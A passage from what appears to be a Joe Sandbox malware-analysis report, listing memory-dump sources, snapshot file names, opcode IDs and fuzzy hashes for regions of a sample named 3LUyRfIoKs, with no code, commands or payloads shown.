                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1732629368d5817fc513c23cf55d69a87dbc499a07cec7d2ffe265986af03831
                                                                                                                                                                                                                                                • Instruction ID: 6b386e6334f297b2233860fd91f61a13f5e6cbf8fa64577e3ce902414d30e29c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1732629368d5817fc513c23cf55d69a87dbc499a07cec7d2ffe265986af03831
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9316AF3F4112647F7588825DCA93A26543DBD1321F2FC2384B596BBC9DC7E980A6284
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 855b7c1aa2779c0896b589c9295f076ebae4667e5d643aba82875e1d3593afa7
                                                                                                                                                                                                                                                • Instruction ID: 72ca46cbd6ccb18f2961019d9a2a1e6252746535cb18abbdb7ec282187651ef6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 855b7c1aa2779c0896b589c9295f076ebae4667e5d643aba82875e1d3593afa7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42211DF3F6252547F3948929DC983A21543D7D1325F2F82788F4C6BBC9D83E5D0A5288
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b1299bb4f858ddc3733c3b794ecaf5b4caa9d82051fe5246441e1fddfca09a60
                                                                                                                                                                                                                                                • Instruction ID: bfe7a8f964429942e636d16305f442583d5aaa0f8b3ceacc638f436c74d64a59
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1299bb4f858ddc3733c3b794ecaf5b4caa9d82051fe5246441e1fddfca09a60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0216DF3F6162607F3544839DD993622543C7D4324F2F42788B18ABBCAD87E9C065284
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bea0747fcd386c40c2dca5ca355f516cace4eeaf80efa7d18fd4347206dea6c3
                                                                                                                                                                                                                                                • Instruction ID: 47313efef628b29754a95b4f14082a04f1f41bc5cd22ab6a6f431ad56bac2171
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bea0747fcd386c40c2dca5ca355f516cace4eeaf80efa7d18fd4347206dea6c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B216DB3F101254BF3548D39CC443A262839BD4311F2F82788E889BBC9D97E6D4A5280
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b53ec43140fa1e995f2930186897738c9138d8885301de129fbed693b57572b7
                                                                                                                                                                                                                                                • Instruction ID: 6a63e8bfcb15405fdd96b19c4561a48951b8bf15bf1e9ed755cbb2cbaccad6e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b53ec43140fa1e995f2930186897738c9138d8885301de129fbed693b57572b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65214CF3F5162607F3688865DCA53726183DBE0314F2F81398F59AB7C6E97E9C064288
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0db27ae6c48e5c3ba11bb79a11da9bac2f82dc06ae9241f6892c447c926995f1
                                                                                                                                                                                                                                                • Instruction ID: dcc0de822cfe71ba352b008ae76eccc13ddb9f0aa7a26ebc24fe28a7a0286ad4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0db27ae6c48e5c3ba11bb79a11da9bac2f82dc06ae9241f6892c447c926995f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 942121F3E0152647F3980834CD2A3666182ABE0315F2F427E8F9E6B7D1EC7D5C455288
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                • Instruction ID: fa5f98469db190e3a1da0a34651089096168118b6d2fab3e914f414fe44ae5cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4511E933E451D40ED3168E3C84405A5BFE30AE3734B19439AF4B99B3D2D6228D8A9354
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349404536.0000000000AF5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3390e9f649cc626d993ffbf55e9ea5b7927c6ef2679b7b0546c40989b29b3301
                                                                                                                                                                                                                                                • Instruction ID: cd7f9b8f3b0e7c3e30a61cb5e2a3e22622bd09b6c8abf9c85745a3e8a9e57ba3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3390e9f649cc626d993ffbf55e9ea5b7927c6ef2679b7b0546c40989b29b3301
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A701F5BA54815E5EAB928E98551C5FFBBADF9C7330334413BF942D6402D2D00F19A238
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                                • Instruction ID: f4e6cf078ada9ee7dedb74696011f0d0fbc03e60abcef5af790aa3ccaaedc80b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d915abd692c596d351a76ef7c44155bf2f7634e88133afcabaf1f94f6f3ee80c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00F03C60114B918AD7328F3985247B3FFF49B23228F545A8CC5E35BAD2D366E10A8794
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                • Instruction ID: 57323921ae74b2b3891860e223b2de9f36eb6ddcdcf37e8834f45d94f9cf9404
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68F065104087E28ADB238B3E4460BB2AFE09B63120B181BD9C8E19B2C7C3159596D3A6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2349207289.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_aa0000_3LUyRfIoKs.jbxd